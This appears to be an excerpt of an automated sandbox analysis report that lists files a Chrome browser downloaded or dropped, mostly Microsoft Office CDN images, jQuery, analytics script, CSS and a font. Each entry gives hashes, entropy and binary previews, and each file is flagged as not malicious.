                                                                                        Preview:.PNG........IHDR..............Y.s....pHYs.................sRGB.........gAMA......a...d.IDATx.....v.U...].....lM.$.-....6...6.%.....Mwg.t:C..I_CV.v.Y!.......C.p...1I....c06x.F.%.%..?}.{j.....v..~..K.e.....3T...N.S..g...`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0..
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 4000 x 2238, 8-bit/color RGBA, non-interlaced
                                                                                        Category:downloaded
                                                                                        Size (bytes):10058400
                                                                                        Entropy (8bit):7.988307130589743
                                                                                        Encrypted:false
                                                                                        SSDEEP:196608:5nHCaQivyot0RWDNzjMqV8CoWF6UquVtmS7ycKUkQfaGG9:ZHCavyI0cDN0qV8rmguVwaKUffaGG9
                                                                                        MD5:7D5C104D8439CC4A1A9618391A52DFC2
                                                                                        SHA1:1EACDB703238FC270187A1A23AA77315EE475ED2
                                                                                        SHA-256:2AB1510CDB2FA03A8CAF6F2CC4A40EBB2B8218922A6AD1F640F4EDD9018E9144
                                                                                        SHA-512:73446F80AC5B2AB4DEE11CAE312D9486CDF1261DE7BB988F55A5C5269825773964857452705CA6B4B165DCA4DFFE7DD13531CA04804E61210DC950CED900C26F
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://res.cdn.office.net/officehub/images/content/images/unauth-refresh/unauth-m365-hero-copilot-centric-7d5c104d84.png
                                                                                        Preview:.PNG........IHDR................g....pHYs.................sRGB.........gAMA......a...z5IDATx.....&.&..J........;>..xt..{.....2.I...vu.....T.PJ.Z....K....Ep..16.r..+.........h9......5q.8.?.....0...|<Y@...y6..B..N./..yI....*e\.....d.MzN.X..V_.N..9..2.5.'A.-#...A4.._..S.|...u_.....J.gd.lR..........i.@y,.?.}[|..>.$p'..zi.#]emv%.!.cO...>.n8r..5..Ro.5.......h.....4.'...[....X....@[..U...v.?4D..4,;y>....r=..L...4\_p...r...~.,..<..r...3....!t._E....Ai....M3...'......z.hl#..j=...0.e;..F...9..9..._.....0..}..".k......`I.r...A...1....+.>.`.g...E..|...1.....!..3{=..s@.-1.....343u...)..Z.k..}u.c.....QG.xy.9;. ^...x..!.S....n..z....O.0.l........M..p?..{.o/...?-..?..,.2ur......[....].b.'C..V.&...e.w`..r..|o..;6.....k..9._.|.{{...'..O..7.g..zG.'.#...~...]....g.$.*.F........o..QI..ge{...8w.t.Z.'.:..!./.......x...:.1.s...'.......D....g.Q.*y.>>.-q... ......sH..........G........<H........S..y>.+......_'k...}........i.=e...kN'_I.:..~ZsY..t$o.C..&).0D...S.....
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 161 x 160, 8-bit/color RGBA, non-interlaced
                                                                                        Category:downloaded
                                                                                        Size (bytes):3974
                                                                                        Entropy (8bit):7.902382111689997
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:ISobo+jDMIdb9KWszfIwrotnp7hVzMECexHrI1vuE2nvg5vzHJ3k:ISqo+jRAfTIwEtp7hy2HrA2vgNTVk
                                                                                        MD5:2BE9B68EED69AE75FBA5ED982D0FF25D
                                                                                        SHA1:BD6E134C0D87C52AC751555269A59796D5EABC55
                                                                                        SHA-256:8281E85E9FF70034913A38D9EAA6AF52ED98AB621300F0558E70A9BCEFF7246E
                                                                                        SHA-512:D72E1C8F52D65BBFE2ECDAF9E7A0C209F4F7C385B470DAB7C0979D3D5F1FF29EC14A5E92334676F560DFD22924B0FB983F43FB936EA23F812ED0C639896F8C60
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://res.cdn.office.net/officehub/images/content/images/unauth-refresh/qr-code-2be9b68eed.png
                                                                                        Preview:.PNG........IHDR.............d.......pHYs.................sRGB.........gAMA......a.....IDATx...u.<..E......B.....X. ... ..T.........X.......G.qf...<..p..u..\[.W#9..zS|..9s...(.?..R.]..9...>..W.v..gR.yS..={...X..eYo9....0J....2.Fu....?..kW...../_..z......?.....}..UT../N..n..X{........Wn.L9.8.........+W..M...)....................r.q...k.....T.4Q7..j..nhcj.&:.*>ST?...q%.4....Fu.N...!.~........'F}.......Mt3D...l..v..B...1u9.`...|...b4.~B........9.Q.sB.:..x,.e;..(.......J2.....I..G.Uo.u....~.z........?...I:.T......9.@..??.?.8.e...N..M.N:!~H.i...q,yG.{^.../Zs26{r1.;a.....c{!...`Q.....EyY...u.%<.k2..1....K.......72.Q...n|.x<."V.{..........w'.W.G.&..L..q.5.'.(8|..kfQ....!....?....Fulf..........9......l.6....+7a..(.h...a0..&........D ....Wk...4.....hY;'....[a....".NSW3.T.&./....9....1}....S.a{d.e..)..c.:.J|..f..I....P.\.?..%._X'...4h...%.../^..K....@....J..[..I....../.....x.0..@.%.q?....k.'.i.R...p.`.Ks@......1'.=Md.b%..P..'.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 1067 x 742, 8-bit/color RGBA, non-interlaced
                                                                                        Category:dropped
                                                                                        Size (bytes):571791
                                                                                        Entropy (8bit):7.997310243142735
                                                                                        Encrypted:true
                                                                                        SSDEEP:12288:GQEnGqYKJ83t1x9Y9c9YA6P/WVzSF3rbuQdzQHULLq:NEnxlJ89LL9YAcoG5H8mq
                                                                                        MD5:27F24F9CACA928D2DD0AA2192FF055EA
                                                                                        SHA1:EFE1BE378E1F124A5F4529FFD45F18CB2E3434D4
                                                                                        SHA-256:47DC43974FD21405DAE835D7A87429F90F3028EE9726A96ECA0F80CD765E22F4
                                                                                        SHA-512:2121BC94FBD792D9D388480CC75B3A6375E2DDAF3A6C6EE6DC7A4934DF1187EAEBCC71481E526D7EF5912A7F10B711B13D72AD5468F825EB331FEC1DB038B55A
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:.PNG........IHDR...+.........km......pHYs.........&.:4....sRGB.........gAMA......a....$IDATx.....n.U.....w.7.<f"....BP0..P.dj!.....A..n.m4.W.o..n..E.li..DD.a.!..B..2..y.J........o.u.{.W..j..[...;g.k....6Q".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (65394)
                                                                                        Category:downloaded
                                                                                        Size (bytes):91802
                                                                                        Entropy (8bit):5.3603423050848615
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:C4F18VDgLMcb+0XbPN1xlJGFqCN3tcULcUoHfe:C4F18VDgLN9LN1mTn
                                                                                        MD5:CF5CC7F4B57526CC37893DCB83DED031
                                                                                        SHA1:E953783BE0A7894585778455AAE3D0DF094D6F29
                                                                                        SHA-256:3A790B6C0D26D7A4D292CB27F992EAFAFF42C37E9318B2AB704207039127FCB8
                                                                                        SHA-512:2320F9D7811CD773C1E5C2E95A31B39E9FF62A2FA7CA431975873DAB57AE42A75BA720D15AEB47FA2EA127D0766EB5AA15040CFFD04BF7A8CB8BCD7236069C40
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://js.monitor.azure.com/scripts/c/ms.shared.analytics.mectrl-3.gbl.min.js
                                                                                        Preview:/*!. * 1DS JS SDK Shared Analytics, 3.2.18. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,n){var t,r={},i="__ms$mod__",o={},a=o.esm_ms_shared_analytics_mectrl_3_2_18={},u="3.2.18",c="oneDsMeControl3",s=(s=e)[c]=s[c]||{},l=(l=e)[c="oneDsMeControl"]=l[c]||{},e=s[i]=s[i]||{},f=e.v=e.v||[],c=l[i]=l[i]||{},d=c.v=c.v||[];for(t in(c.o=c.o||[]).push(o),n(r),r)s[t]=r[t],f[t]=u,l[t]=r[t],d[t]=u,(a.n=a.n||[]).push(t)}(this,function(e){"use strict";!function(e,n,t){var r=Object.defineProperty;if(r)try{return r(e,n,t)}catch(i){}typeof t.value!==undefined&&(e[n]=t.value)}(e,"__esModule",{value:!0});var y="function",m="object",se="undefined",C="prototype",I="hasOwnProperty",b=Object,S=b[C],x=b.assign,w=b.create,n=b.defineProperty,_=S[I],T=null;function O(e){e=!1===(e=void 0===e||e)?null:T;return e||((e=(e=(e=typeof globalThis!==se?globalThis:e)||typeof self===se?e:self)||typeof window===se?e:window)||typeof global===se||(e=global),T=e),e
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 2609 x 471, 8-bit/color RGBA, non-interlaced
                                                                                        Category:dropped
                                                                                        Size (bytes):698616
                                                                                        Entropy (8bit):7.988990542773947
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:7B7J02MzM8uOZuft67QhY3HZuppyR3l6Pjk48XOIWoXZQikJSPU7NLRlg:s2MzOOZulaQhY39xMrhQWoXaiwSc7/y
                                                                                        MD5:A907814C618999761488552FF59ABE52
                                                                                        SHA1:9328DD8911EFD581DAF9F18649B687C683D93787
                                                                                        SHA-256:A85710F22BD11B8F228D8B7387F87E5A066FF7CAB256D9719D01881A00FD7CE8
                                                                                        SHA-512:8982B24CFC82EBD3A6E9DC0C6996B2E04963F60A248DF3EA1C89EFBA52D49E2A6660B0321F4A217BA8778B1D301C43C91598D450D22451EC0F393A38EB8786A4
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:.PNG........IHDR...1..........Y.....pHYs.................sRGB.........gAMA......a.....IDATx...=.vG.&.E..|O...E.@. .P.CC#./.<.C{%S...B.d6...|..]o..b8.Z..5h-.......E.{>{.N......WF....V..p...<....'3.#..h.....?5..<.8..\[\9....oB.. ...8c>.........".~.....{......,w.y-...Q..A..9..#<....M2K..*}.,/.x.CiW2U..G...@.t.s."...k%}.4f.F:...C.-Q.#u.?R..."..y../...;~.Wxq}K. .n.Vr.p*.W..W=.G..G.n...i...|..E..,.?........]9.b..}...-../8.">...U\..6..-..i...xo.........e..u.=.............~.|.n...JZ.M.A_.._.e..7...L........S...O./.|S..|."o...........]\.q].jI.}.5.#M).............o....T..2.,......o.j...;...=.KY..t..e............w...W.... .............A..?.m\.=.../...y.....K..6.{._.._p...?.........?.s..?..\................w..O~...~..?..?k?...z...~k.|..Q.-.@)..o.i.~.a.f.w..>.....O<...+../...o.._....._.j.oso.t^.R..R..bj..M7.t.M7.t.M7.t.M7...D.6.}..g....'...N...../.l......2Wi_..u../~..W...........?w.o+y.tZ.wX.sU..?tL...g....T..j.mG?..C.........k..}..K...5.5.3=.s-.r.._....
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 76 x 99, 8-bit/color RGB, non-interlaced
                                                                                        Category:downloaded
                                                                                        Size (bytes):61
                                                                                        Entropy (8bit):4.068159130770307
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:yionv//thPlRctnlTqB/xl/k4E08up:6v/lhPAtlmR7Tp
                                                                                        MD5:763F19759CCBE7AFE90B07FA4C0729C1
                                                                                        SHA1:4C54D839FE94E3E33613140001EA10D4092FA726
                                                                                        SHA-256:139F5E5A4B50BCE5D745C104B8A34560E924A756867B3EAC9F6EB5CE2A18F28F
                                                                                        SHA-512:8537DC206CA7CC4AAC846425A15C1E189AD27594E7E68FFBD651CA0C225D56F47003667AE2476961D6882AA8F5FFFCBF233A67F39DAF7B4D63D4760A62D2D882
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8f3b461238074211/1734484236191/2ItuRd0ocevcQB0
                                                                                        Preview:.PNG........IHDR...L...c.......q.....IDAT.....$.....IEND.B`.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (65447)
                                                                                        Category:dropped
                                                                                        Size (bytes):89501
                                                                                        Entropy (8bit):5.289893677458563
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                        MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                        SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                        SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                        SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 2501 x 832, 8-bit/color RGBA, non-interlaced
                                                                                        Category:downloaded
                                                                                        Size (bytes):1771981
                                                                                        Entropy (8bit):7.988247142332494
                                                                                        Encrypted:false
                                                                                        SSDEEP:49152:4uB7Y0eaS7xe+q6frEduiPaUU48p5fUxGVPaUZUq:bVeaSdPfmtPhU48p54qaUZ3
                                                                                        MD5:0E10BF7B4FD04ED50A4073604A728FEF
                                                                                        SHA1:7773AC6F48BD27CED0F82FD58A45F2C923EF87A4
                                                                                        SHA-256:361AF6EA15689C97588C78A27C25C38C789D9E68B9400AD48B114B05FC285662
                                                                                        SHA-512:82430B2B1C62635B876CF652FC160F295AB9AEF84D65F310C71BBCD0D44EC6359AFC4FEB70E58CCC8A19F21A2FE2C292F9FF79887C4A17532D21D2835E1624B2
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://res.cdn.office.net/officehub/images/content/images/unauth-refresh/m365-copilot-centric-value-consumer-0e10bf7b4f.png
                                                                                        Preview:.PNG........IHDR.......@.............pHYs.................sRGB.........gAMA......a....bIDATx....,[~...Z.Y...>..{..#Z...DJ....)..MQB........;.a.../..~..~.-.!*.pX. C...e..Hq....F..{...U.ki....2.j..$..8.~...UY.+W....:...s.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 12164, version 1.0
                                                                                        Category:downloaded
                                                                                        Size (bytes):12164
                                                                                        Entropy (8bit):7.974502474637253
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:H6HeldTaRsyn12Mg0UuCR3A6dTovEIZmiA6JWqNb6aNBPiGXoGJYrI8tTebCFFvK:aHevMsYHeeqcvpZmiA6JWwfXoIa1vpKF
                                                                                        MD5:36AC9A2365173B647657AD829AE64FF0
                                                                                        SHA1:F8966E2EE4C9CFE92B5843D8C27BB7BED98BDFC9
                                                                                        SHA-256:633894CF845287F205F1B5BD26B7667DDA186695FCE3D789306F30C5FBDB14B5
                                                                                        SHA-512:9F8C9EC9BB230D577BC751133040EF6FB78185C5310300A420E389879A7ABEE054095C60BA2A66C6FF3A7AC4FB59B7433A733FCEDDB72425D3AEB8229EF590FE
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semilight.woff2
                                                                                        Preview:wOF2....../.......[.../#........................?FFTM..&..... .`..z......X.+.....6.$.... .....p..O5l[..n...8m.Q.l....d...S..Gk.U..#.S.T...#.....>y.s[t...b...r.....M..u......x......Yj........;...a.....wGH2K.......b.q..@/..Rp.v.................'.T.lA.d.,EED..j.W....kY...e._.......N.6...(.=..0....s.8...4.((*..R.tkv.{Q..D.*.*..w.?#0.XvTD......8.. .,.......y.T....5..SBr.,h8.G.b..CQ.P...3L.4..~*.k|.X......+......mN..us7.Ksk..........|......c8@.DF^.|....!#.B.T..............2...d...2.9.=..@o.8H.2..".....V..C..{.........1.>.F....`....A.Q.:..'.#..zr.sT.P..3...K.'z.....<..L.%...V..y.i.4.;.Xv.1...N$@..n.1....._.\.x...x.x{..:..V.....[.@@..b.....@.9...-.9. :.,...,p...v..H...4..x.B..[.s..M7.X.ww............g....<...q;].'.....UUG.w....4)...Jg.Y.r65.fvn.6_7.....g.w......zU....M.RZV.M{F{.M.8._.)p.6.YwH..Ohk~0. .-.*l....A..9g..sC..}m.4...C...QJ.vP._3H{......rwn.<..3I~.v.t.+..'K....@X`..)...........I!Y.B....j.]y>........... .`.*5i..4./..../ ..T.fR.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 973 x 675, 8-bit/color RGBA, non-interlaced
                                                                                        Category:dropped
                                                                                        Size (bytes):279269
                                                                                        Entropy (8bit):7.994566583539726
                                                                                        Encrypted:true
                                                                                        SSDEEP:3072:RiwpUTuOsjVbgT94HFlcTY+/+T8tDtnSTFaslpolHpMerO+lMbQfVwv6p1YH:XG+jB894HFGTVw8QgGbMY
                                                                                        MD5:8548B8B68D33DBF376420E679FC84996
                                                                                        SHA1:7A277E16B935833A6403DEAD1CF5A7661F20DB24
                                                                                        SHA-256:CDFE0542BE718F847059F73ABC6EF56387109AB760D5530046F2EF9EDB25ED31
                                                                                        SHA-512:AED4FD1D6EBACFBBECBCCAE8CF4F4F13319D355723CF16F830C315884FCDE9EDAA929E5EEF78A36006FC0412AB1224AF311906883BA7391DF7165D7F3D808E00
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:.PNG........IHDR.............'?.k....pHYs.........&.:4....sRGB.........gAMA......a...BzIDATx...[...u...1...>..bU.b..)..).%9.":blK.,..0....v...@.h4........~k.../...:p.8.a'...u.,Z$-.WU...?g........"e.UG..<..^...c.o..E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-..'.E........^...D.....J..|.9}........)}.zq..~..Y.O_........?.....=...}..s<..?....=.q{Vy....o\.=.~t.l~??......@;..s...
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 1409 x 979, 8-bit/color RGBA, non-interlaced
                                                                                        Category:dropped
                                                                                        Size (bytes):1074513
                                                                                        Entropy (8bit):7.992502130294777
                                                                                        Encrypted:true
                                                                                        SSDEEP:24576:Z5bdLk74D3xyaSraAjS7kyTxnkExgpDUPJ2NNu:ZHL9DhZSrbjSQy1mpQPJ2q
                                                                                        MD5:86723A74CC0FCAD23D9BF25A8EC33CAC
                                                                                        SHA1:24579C0CD153ED5B5856520E8B91FB2A61DEE8B3
                                                                                        SHA-256:CC6DEB15D98EE0D2F63E0FB260700C6579394AB15BC09CBB4B11ED925F701EF7
                                                                                        SHA-512:F2D60AC241146C08FF92AD548A111F5794321FBB04F70176D8187D38D89F7862D7F3D841DBA4C8138DA7C591897050040BC39EFE3CD4ACBFF1798ACF05E0AF82
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:.PNG........IHDR..............Y.s....pHYs.................sRGB.........gAMA......a...d.IDATx.....v.U...].....lM.$.-....6...6.%.....Mwg.t:C..I_CV.v.Y!.......C.p...1I....c06x.F.%.%..?}.{j.....v..~..K.e.....3T...N.S..g...`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0..
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 2609 x 470, 8-bit/color RGBA, non-interlaced
                                                                                        Category:downloaded
                                                                                        Size (bytes):713010
                                                                                        Entropy (8bit):7.987989282294461
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:U/c+B7hHsXoxmtGQolRbB//k45VaX4P1g+7TX9r4FYyPxquW5:UFhOoeGQwRbB08E4P1gqN4FfP4uW5
                                                                                        MD5:FA4FE5B56D9FAB46DB542559A3B83E37
                                                                                        SHA1:87921556BC7E350DEF09A7CBC51465C52383428D
                                                                                        SHA-256:9872BD2450803A2A52E862DE35CA6FA5F1684AC59174F73C7F80EADFC0B63002
                                                                                        SHA-512:8E58F7075D015C0280DCF0845A4FD84498E738EA57232E56A152336B611E2681EFB19C5824A31203E84B92E0355AFBE2447AD3CF76AABA1B3DA431471DB4D8D4
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://res.cdn.office.net/officehub/images/content/images/unauth-refresh/more-apps-copilot-centric-mreb-fa4fe5b56d.png
                                                                                        Preview:.PNG........IHDR...1.........<.9.....pHYs.................sRGB.........gAMA......a.....IDATx..O.uGr.Vu(K.lS$1..b.0.. ."..."..|.d.u..*..,.d1...o...0...I...XY.Z.0....Hp..-K...._W...>............}...[.t..._....bfBdp.e..G)-.z...jT....v.62.rxo/.Z.U...t....6~.>.x..<.8.....-.....+.{.3.7..6..g.....4.....Z..;...Y..X/..yC...4....}..Jn.".ej.W<Sn#.3.......o.K.?/.d.C)_.....'...,.P.P.8o.f.+.?....Mu`..u.y.1..A..d..$y;a|b.Ve.....,oWr.....{....\.U.2.j..4=...?c^.Z......z)....${M>+Yb^.Y.r....0...8N.../[.7.x#.{....+..<...yQF..i.s...._E.JV.a..wY..T.6n>N..-l...=..G^.g.=.Om.r..B=.|.y.[..[.........u...~...g........._...Ch.;..m#..<.)._..................i..u.......).....=..Lk.v.....N..._.U...._.f..r........_.................L.7N...........v.........?...z..U.....;..........?.G.HnW.W.oy~...o.9..g..g......]..........G..o..V......o..F.}..Q........._}..~...v.g*....'.|b.y....M.6m.i.M.6m..{$..tj..>.L?..S.c..w..~../..B?...TF.:..>...'?.....-|.=.M......?my.{.=Y.....w.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (64241)
                                                                                        Category:downloaded
                                                                                        Size (bytes):171505
                                                                                        Entropy (8bit):5.043804815226508
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:jzCPZkTP3bDLH0tfRqQ0xtLfj4ZDSIpTt813viY8R1j35Ap7LQZLPPJH7PAbOCxb:jlZAW3kJeqg
                                                                                        MD5:8F186BBA557DC6140841C682AF4D60EE
                                                                                        SHA1:CE2F96E57EE3D9ED15B8A2DD3EBDC7E54439AF98
                                                                                        SHA-256:CDA4813A965CCD1AAA50550D08B928AAF4C7F50B6F77823213FE3A97E806C2F1
                                                                                        SHA-512:17ACC430C28A171C1FD029C1B0EB67BE14ED41ED9F7F10E4040ABA1FA39B8DA5CAC7CDF979BAB6CAFAD126AA94C88D123F170E78C51745C3833AE80AD23FB36A
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://www.microsoft.com/onerfstatics/marketingsites-eus-prod/west-european/shell/_scrf/css/themes=default.device=uplevel_web_pc/1b-9d8ed9/c9-be0100/a6-e969ef/43-9f2e7c/82-8b5456/a0-5d3913/52-918540/ca-ae3ce4?ver=2.0&_cf=02242021_3231
                                                                                        Preview:@charset "UTF-8";./*! | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.*/./*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */.body{margin:0}.context-uh
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 286 x 41, 8-bit/color RGBA, non-interlaced
                                                                                        Category:downloaded
                                                                                        Size (bytes):7115
                                                                                        Entropy (8bit):7.963812060299321
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:ESBW7OKnwRKKrPq0lxbF4vMU7YzO1gR3C2Wl2:DY7PSrLprUEF3CH2
                                                                                        MD5:747D2C674F731EDFD2779D83C8532E24
                                                                                        SHA1:C40A635C160D4CA763D8C86F560CB937A8E1090B
                                                                                        SHA-256:CA13C3E1EC9B3484F3E6AF002F127C03DE8E5171E76D37A5749A3CD75D098B05
                                                                                        SHA-512:ED821EAB2956895A140C55AE7F79668F8DBB55D54408251ADED0C57200D8AD04E40DFF95EEBA79D6D149FDF82FE77F21EEEBB235EE7BC12C84A6FF0DD3CB6691
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://res.cdn.office.net/officehub/images/content/images/unauth-refresh/store-buttons-747d2c674f.png
